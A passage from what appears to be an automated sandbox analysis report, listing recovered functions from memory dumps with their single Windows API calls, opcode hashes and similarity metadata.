                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 3c2a8eb17591d261fda869e8c093737d0e557aed46e9c6413be1f2fa3b3fae72
                                                        • Instruction ID: e0baedb39c53622aca054dd382a04c91c7f3290599ad255f1f6816ea413f479d
                                                        • Opcode Fuzzy Hash: 3c2a8eb17591d261fda869e8c093737d0e557aed46e9c6413be1f2fa3b3fae72
                                                        • Instruction Fuzzy Hash: 18219D71600300AFEB20DF25CC85BA6FBD8EF08220F04846AE948DB282D775E904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 752c4572eb330af59e3374a4e49060338264a8ce074550e063ee33efc404bc47
                                                        • Instruction ID: 48a41749a920305a70cc53dd1c6ffca4854cd5b3094e0e50e39291833e855ac9
                                                        • Opcode Fuzzy Hash: 752c4572eb330af59e3374a4e49060338264a8ce074550e063ee33efc404bc47
                                                        • Instruction Fuzzy Hash: 3C119D72500304EFEB21CF65DC85FAAFBA8EF04320F14856BFD459A241D671A9048BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: c54f800dbfa441e5cd746acf1caa01af1bcaeaef688cf249f88879aabb95bbcd
                                                        • Instruction ID: 485d939b26428b8f22b495b7677ef5e1ea9b66d4dfe5ea942dd335fd14096405
                                                        • Opcode Fuzzy Hash: c54f800dbfa441e5cd746acf1caa01af1bcaeaef688cf249f88879aabb95bbcd
                                                        • Instruction Fuzzy Hash: 21117C71600700EFEB21CF19DC85FAAFBA8EF45660F14846AED49CB291D674E9048AA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 973ff0353032c46d86126ee17b96474f283996c08f160c242f32573b5c15f4f4
                                                        • Instruction ID: 94d12eb4c3a51eebc6b7d960ceb81a3711f5cb6af46fd7cedce17e7abc0b2318
                                                        • Opcode Fuzzy Hash: 973ff0353032c46d86126ee17b96474f283996c08f160c242f32573b5c15f4f4
                                                        • Instruction Fuzzy Hash: 4C2192725083809FDB21CF25DC45B96FFB4EF06220F0884AAED858B662D235A458DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 0b22164800bd5a861f355119c48767e99c46124e519f0b86392758bb2b309e71
                                                        • Instruction ID: 112089e0059874ee14b8e194d7e644aa6eb5bff41a49593a2468294fc9f30a18
                                                        • Opcode Fuzzy Hash: 0b22164800bd5a861f355119c48767e99c46124e519f0b86392758bb2b309e71
                                                        • Instruction Fuzzy Hash: 5A215B7150D7C09FDB12CB25DC55B92BFB4AF07224F0D84DAE988CF293D2659808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 7e5133145be3cc5a1b5c573d4db5ce308168f164a85b38688c2c2bf064e3971a
                                                        • Instruction ID: c405b6bc8509294ca11e9ecd4469200f2fbb916d04bac53a67956af4becb369a
                                                        • Opcode Fuzzy Hash: 7e5133145be3cc5a1b5c573d4db5ce308168f164a85b38688c2c2bf064e3971a
                                                        • Instruction Fuzzy Hash: 5021A1725093C09FEB128F25DC55B92BFA4EF07320F0984DBDD858F263D264A908DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: ff7ad373cae6ae959772fc2bda4541677e34ca824b0e296dc4747e649bacfc8e
                                                        • Instruction ID: a4b85902b6a976c20f726badddbe8bcc4e707c14ee680de99e55518a3774794f
                                                        • Opcode Fuzzy Hash: ff7ad373cae6ae959772fc2bda4541677e34ca824b0e296dc4747e649bacfc8e
                                                        • Instruction Fuzzy Hash: EE2172716053809FEB22CF29DC44B52BFA8EF5A211F0885AAED49CB253D265E404CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: ada354fa0b628c09242b1f286529a8df5655be92b88a44fbef1d576e25dcc662
                                                        • Instruction ID: ae9a8bf2181b2860331e91ce83ac7d6b760af33ee42a03f44784817bf6f170d0
                                                        • Opcode Fuzzy Hash: ada354fa0b628c09242b1f286529a8df5655be92b88a44fbef1d576e25dcc662
                                                        • Instruction Fuzzy Hash: 01216D6140D3C4AFD7138B259C54A62BFB4EF57620F0980DBDC858F2A3D2695818D772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 01D5AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 2ae28f124c5e6e05a6ab94d2139b12c8cfdc1c1e7af491f600eb3d300037d05d
                                                        • Instruction ID: 67d426fcb75f065efdab781fbc52e2e1e0b7ff66c90dd00d2261f519fda18b82
                                                        • Opcode Fuzzy Hash: 2ae28f124c5e6e05a6ab94d2139b12c8cfdc1c1e7af491f600eb3d300037d05d
                                                        • Instruction Fuzzy Hash: 8311C172500304EFEB21DF59DC85BA6FBA8EF44720F14856AFD498B281D671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 1cb73844f68944086250ce63ee5b07ce3ae5f4ebdc1d66ba5d34b00cb270b618
                                                        • Instruction ID: 2c47401e2aabfb210fbb9df68e1b938b7edbe0e2bebbf6fb15e413f8067d6e18
                                                        • Opcode Fuzzy Hash: 1cb73844f68944086250ce63ee5b07ce3ae5f4ebdc1d66ba5d34b00cb270b618
                                                        • Instruction Fuzzy Hash: ED119071504380AFDB22CF65CC45B52FFF4FF19210F08849AED858B662D375A418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 027708E5
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 07b5feef8568869458dda730c023123bc2c1dfa794da3c80351b42b8408433de
                                                        • Instruction ID: 33463c9c851efb01be590faf5c00e419eecf80cb77a3d792dec59373be2bfe71
                                                        • Opcode Fuzzy Hash: 07b5feef8568869458dda730c023123bc2c1dfa794da3c80351b42b8408433de
                                                        • Instruction Fuzzy Hash: E011E072400300EFFB21CF51DC85FA6FBE8EF18720F04896AEE499A241C671A904CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01D5A39C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 1840a719ca1021684f71fd87d073ceea558cab86dfded940573626ee3b66a1b0
                                                        • Instruction ID: fb3cb22699f3820cb875cf6414794f8beaf1eafc104d16c01805d7450ab0d0e0
                                                        • Opcode Fuzzy Hash: 1840a719ca1021684f71fd87d073ceea558cab86dfded940573626ee3b66a1b0
                                                        • Instruction Fuzzy Hash: 24118F714093C49FEB128B25DC54B62BFB4DF47624F0881DBEDC54F263D265A808DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: 6a6b33669b3c66886ef85e1956c173e49e3950cab810444f5ce1c9afd510876c
                                                        • Instruction ID: 0e761c9cf12c1972bbf3f4cc61dbf8fbfb96788549c3b85d809218b49054249f
                                                        • Opcode Fuzzy Hash: 6a6b33669b3c66886ef85e1956c173e49e3950cab810444f5ce1c9afd510876c
                                                        • Instruction Fuzzy Hash: AD1191715093849FDB118F25DC45B96FFA4EF46220F0984EEED498B262D275A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027705E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 2bb3313383cc9bd2ab1a729bed9be96e468b911839dd75ddac5a623e0c838108
                                                        • Instruction ID: 50f956a0f40288a80e394117886996b6e740089b544fcc3779d32fe6ada81a28
                                                        • Opcode Fuzzy Hash: 2bb3313383cc9bd2ab1a729bed9be96e468b911839dd75ddac5a623e0c838108
                                                        • Instruction Fuzzy Hash: 8D1102755093C09FDB128B25DC94B52FFB4EF42220F0880DBED858B2A3D265A808CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D5AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 10c60ba55c2183e0eb839922b45936630d54d8230234cf894a5fbfc6a629ed00
                                                        • Instruction ID: 01b6f4ae197ee9f4bb0ca99dca5762141415e3d46c49be534517dc119fe91c1c
                                                        • Opcode Fuzzy Hash: 10c60ba55c2183e0eb839922b45936630d54d8230234cf894a5fbfc6a629ed00
                                                        • Instruction Fuzzy Hash: 30115EB56003009FEB60DF29DC85B56FBD8EB18661F08896ADD49CB642E675E404CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D5AA71
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: b6bb43341a4af97d05803f2dba1f94767fa9b293ec0ebc95ab7e617d3c6d9f69
                                                        • Instruction ID: 043971bea789a0c819f574ddbc419cbe6a529b8a834ce011b0257bcf30021040
                                                        • Opcode Fuzzy Hash: b6bb43341a4af97d05803f2dba1f94767fa9b293ec0ebc95ab7e617d3c6d9f69
                                                        • Instruction Fuzzy Hash: D411947540D7C09FD7128B25DC45792BFA4EF07224F0980DBDD858F263D2695909D762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0277099C
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: b5d1dfe5b4c54fd0600f3c5f6913c2b7cf34caf7ea94e02125d618dcd6dfdfa3
                                                        • Instruction ID: 1f6014fd4a27b686318647816878456e98642070282842e0cf29db64213d3094
                                                        • Opcode Fuzzy Hash: b5d1dfe5b4c54fd0600f3c5f6913c2b7cf34caf7ea94e02125d618dcd6dfdfa3
                                                        • Instruction Fuzzy Hash: 1911BF714093C09FEB12CB25DC55B92FFB4EF07324F0980DADD844B263D265A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027707C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8E06FC8A,00000000,00000000,00000000,00000000), ref: 02770819
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: be59f9469fee0cf521219e34fdd56ceeebb6d13b8556b2f72f0ef50bf17dfe52
                                                        • Instruction ID: fd44f688cfe11697fe0bebc90bdfa7de87189b898209ec392ae6ac26b31ad985
                                                        • Opcode Fuzzy Hash: be59f9469fee0cf521219e34fdd56ceeebb6d13b8556b2f72f0ef50bf17dfe52
                                                        • Instruction Fuzzy Hash: 6C018C71500704EFFB209F15DD86BA6FB98EF44721F1485AAFE099A281D674A904CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027713AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: fd869831fc04c1c2e3a60fdd6da6ad37e482bce9aadcd912971f5e8c77c1731c
                                                        • Instruction ID: 656c09f795dbb0690dfe504a702a524ae8e2e224bd6f8f4e9db37e1e0c3961cc
                                                        • Opcode Fuzzy Hash: fd869831fc04c1c2e3a60fdd6da6ad37e482bce9aadcd912971f5e8c77c1731c
                                                        • Instruction Fuzzy Hash: BA11AD76500700DFEF20CF56DC85B66FBA4EF04620F08C4AAED4A8B652D371E418CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D5ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 3957c5fa2f04c3d3eb5ff1deb512d3c6135b7f9ff9fdf8dcc5d32d59ecc59fcc
                                                        • Instruction ID: 11883621617defb0ce4059626d2e7bb9abdf2eb3396e36b7e22fec46a4c4bca4
                                                        • Opcode Fuzzy Hash: 3957c5fa2f04c3d3eb5ff1deb512d3c6135b7f9ff9fdf8dcc5d32d59ecc59fcc
                                                        • Instruction Fuzzy Hash: 3A11CEB54093809FDB11CF25DC85B92BFA4EF46320F0984ABDD488F253D274A508CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D5BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 592f87499d9cbd5b6b265adad4a8e9c5a4d7efad02efe1ae102951895aa7693b
                                                        • Instruction ID: 45eec92b9b1ce210b498981c5bfdf4b4782e11fc6ddeec3f6c402fa399fc3916
                                                        • Opcode Fuzzy Hash: 592f87499d9cbd5b6b265adad4a8e9c5a4d7efad02efe1ae102951895aa7693b
                                                        • Instruction Fuzzy Hash: BD117C72500700DFEF61CF55D845B62FBE5FF18221F0885AADE898A612D271E414DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01D5A23E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 75fdae71ce18473a8844d4a7fe84cfa7926307616ed2d2a66a809ff17ddf6f39
                                                        • Instruction ID: c412c620a15e9f734edee6407f3d34149d17152ade683352a67d87a99bb0e65c
                                                        • Opcode Fuzzy Hash: 75fdae71ce18473a8844d4a7fe84cfa7926307616ed2d2a66a809ff17ddf6f39
                                                        • Instruction Fuzzy Hash: 3C018471900700AFE310DF26DD46B66FBA8FB88B60F14856AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 7e8dd76097833bab3ae3bf35a8ccb988318fa8a64acb6224185eff1d30574f56
                                                        • Instruction ID: 19806279a42080b77d3b34e8cfcca3fff02a1c8a7f33bbec83b05d3ee4ebaa3f
                                                        • Opcode Fuzzy Hash: 7e8dd76097833bab3ae3bf35a8ccb988318fa8a64acb6224185eff1d30574f56
                                                        • Instruction Fuzzy Hash: D1017171900600ABE310DF26DD46B66FBA8FB88B60F14856AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: e835b80bc0de0a5dd70b90ea37f725844486cf5b69901a6e50ae9d701ecd4269
                                                        • Instruction ID: 20df1a8a064402514db819be86485aeaf1fb7b77725f566b4b7649c5cb147971
                                                        • Opcode Fuzzy Hash: e835b80bc0de0a5dd70b90ea37f725844486cf5b69901a6e50ae9d701ecd4269
                                                        • Instruction Fuzzy Hash: D2015A72604744DFEB10DF6ADC857AAFBA8EB05621F18C4AADD09CB642D674E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D5BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: c8c37abc244d1aa1ef0badcb6b57690990e9e25cd86d0a9178b817c2704b657d
                                                        • Instruction ID: 2b0a5e13f3f53d0b2ce659fab9e580899bf618a72a5d0983a5369181e50f1285
                                                        • Opcode Fuzzy Hash: c8c37abc244d1aa1ef0badcb6b57690990e9e25cd86d0a9178b817c2704b657d
                                                        • Instruction Fuzzy Hash: 3401DF71900300DFEF60CF19DC857A5FBA4EF04620F08C4ABDD498B256D2B5E804CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027712FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0277132F
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: f0f9deba7158c333f5028275195f07513b03f741747932796703cbf89e48b2f7
                                                        • Instruction ID: 4116b760313cb358b7662dceaf32f6bce988f698d4420bbb2f221e8016d48484
                                                        • Opcode Fuzzy Hash: f0f9deba7158c333f5028275195f07513b03f741747932796703cbf89e48b2f7
                                                        • Instruction Fuzzy Hash: B001DB71904300DFEF20CF29DC85BAAFBA4EF04620F48C4AADD098BA52D275A404CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5A8FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01D5A94A
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2152517796.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageName
                                                        • String ID:
                                                        • API String ID: 2060303382-0
                                                        • Opcode ID: 6b8b6bae16ecbe8c47a14b95406eea0ee947f496117cf3bb0914d9c91d40bdf9
                                                        • Instruction ID: 4bf3bb2fb97219358ec3e67974e3cd8683b8bcc4b37bcb877134aea9b2f723a2
                                                        • Opcode Fuzzy Hash: 6b8b6bae16ecbe8c47a14b95406eea0ee947f496117cf3bb0914d9c91d40bdf9
                                                        • Instruction Fuzzy Hash: 08018171940700ABE310DF16DD86B26FBB8FB88B20F14825AED085B741D275F925CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02770F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: 3d96b1ff97679652abf98e7a2765e2212ade7acaa2d8dc8258bedd0fc8706f78
                                                        • Instruction ID: f6ebd71eee0797bbe64fd6376cb6284d09833a5e63040bc1b1d415208608d50e
                                                        • Opcode Fuzzy Hash: 3d96b1ff97679652abf98e7a2765e2212ade7acaa2d8dc8258bedd0fc8706f78
                                                        • Instruction Fuzzy Hash: 8A017871904340DFEB20DF25D885B66FBA4EB06660F08C4AADD08CF246D374E408CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 027704B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 085e947fce1a193d4ea19f26fd795a00f0148af6a86a1e901bb30d87b7b3cf76
                                                        • Instruction ID: d1153be0f34db509d55539db481a52fdfc4e9fd1b1254fc6bcd7466d9540e78a
                                                        • Opcode Fuzzy Hash: 085e947fce1a193d4ea19f26fd795a00f0148af6a86a1e901bb30d87b7b3cf76
                                                        • Instruction Fuzzy Hash: 69016D71940600ABE310DF16DD86B26FBA8FB88B20F14825AED085B741D275F925CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0277060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02770640
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.2162885938.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: adb19cf748f4852ef613261e9c45c4ec7a7f0052236104cb3622660a2c096af6
                                                        • Instruction ID: ef440237105ecf7f15ff52dbe0bae9731ee0c5afde87fc546ac6f380473f2ae6
                                                        • Opcode Fuzzy Hash: adb19cf748f4852ef613261e9c45c4ec7a7f0052236104cb3622660a2c096af6
                                                        • Instruction Fuzzy Hash: FD01FF35600700DFEF208F15D889761FBA0EF45721F08C0AADD0A8B752D275E808CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01D5AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
